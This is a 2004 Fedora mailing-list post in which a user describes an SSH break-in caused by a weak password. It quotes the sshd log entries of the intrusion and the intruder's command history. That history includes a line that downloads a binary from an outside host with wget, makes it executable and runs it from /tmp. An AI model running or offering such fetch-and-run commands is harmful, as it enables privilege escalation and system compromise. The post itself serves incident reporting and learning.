Vulnerability on FC3T2 ? Present in FC3 ?
richard mullens
mullens at ntlworld.com
Mon Nov 22 22:15:27 UTC 2004
richard mullens wrote:
> Someone logged into my system on 13 Nov 2004
> I found the following in /var/log/wtmp
>
> 207-36-180-20.prt.primarydns.com
> demo.allegientsystems.com
>
> My user password was changed - but not the root password - and the
> following commands had been executed:-
>
> w
> uname -a
> cat /etc/issue
> cd /tmp
> wget chebeleu.com/local
> chmod +x local
> ./local -d -r
> ./local -d -r
> lunx
> lynx
>
> There is a similar report dated 10-Nov-2004 at
> http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631
>
> where someone suggested it might be the exploit at
> http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
>
> Anybody know any more ?
>
Many thanks everybody. I came here to learn and this is the proof that
one should not have password = username.
Over 7 days, every five minutes or so, someone attempted to gain access
to my system with root and all sorts of different account names.
Finally they succeeded:-
[root at caesium ~]# grep -v uid /var/log/secure.2 |grep richard
Nov 13 22:33:42 caesium sshd[4586]: Accepted password for richard from
::ffff:207.36.180.20 port 41610 ssh2
Nov 13 22:34:18 caesium sshd[4633]: Accepted password for richard from
::ffff:208.251.178.235 port 55717 ssh2
[root at caesium ~]#
Time now to wipe the system and install FC3 using stronger passwords on
my account.
More information about the fedora-test-list
mailing list